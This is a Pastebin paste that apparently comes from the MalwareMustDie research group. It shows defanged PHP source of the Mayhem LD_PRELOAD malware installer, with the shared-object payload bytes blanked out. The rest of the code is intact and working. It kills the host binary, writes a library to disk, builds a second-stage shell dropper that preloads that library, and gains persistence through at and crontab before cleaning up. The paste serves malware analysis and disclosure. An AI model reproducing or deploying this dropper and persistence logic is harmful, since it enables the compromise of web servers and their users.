Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Sample jinxed source code of the .SO ELD LD_PRELOAD PHP malware installer
- // MalwareMustDie
- <?php
- header("Content-type: text/plain");
- print "2842123700\n";
- if (! function_exists('file_put_contents')) {
- function file_put_contents($filename, $data) {
- $f = @fopen($filename, 'w');
- if (! $f)
- return false;
- $bytes = fwrite($f, $data);
- fclose($f);
- return $bytes;
- }
- }
- @system("killall -9 ".basename("/usr/bin/host"));
- $so32 = "xxxxxxxxxx";
- $so64 = "xxxxxxxxxx";
- $arch = 64;
- if (intval("9223372036854775807") == 2147483647)
- $arch = 32;
- print "Arch is ".$arch."\n";
- $so = $arch == 32 ? $so32 : $so64;
- $f = fopen("/usr/bin/host", "rb");
- if ($f) {
- $n = unpack("C*", fread($f, 8));
- $so[7] = sprintf("%c", $n[8]);
- print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
- fclose($f);
- }
- print "SO dumped ".file_put_contents("./libworker.so", $so)."\n";
- if (getenv("MAYHEM_DEBUG"))
- exit(0);
- $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
- /* second stage dropper */
- $HBN=basename("/usr/bin/host");
- $SCP=getcwd();
- $SCR ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\n";
- $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
- @file_put_contents("1.sh", $SCR);
- @chmod("1.sh", 0777);
- /* try at now, file will be removed, crontab cleaned on success */
- @system("at now -f 1.sh", $ret);
- if ($ret == 0) {
- for ($i = 0; $i < 5; $i++) {
- if (! @file_exists("1.sh")) {
- print "AT success\n";
- exit(0);
- }
- sleep(1);
- }
- }
- @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
- if ($ret == 0) {
- for ($i = 0; $i < 62; $i++) {
- if (! @file_exists("1.sh")) {
- print "CRONTAB success\n";
- exit(0);
- }
- sleep(1);
- }
- }
- print "Running straight\n";
- @system("./1.sh");
- ?>
Add Comment
Please, Sign In to add comment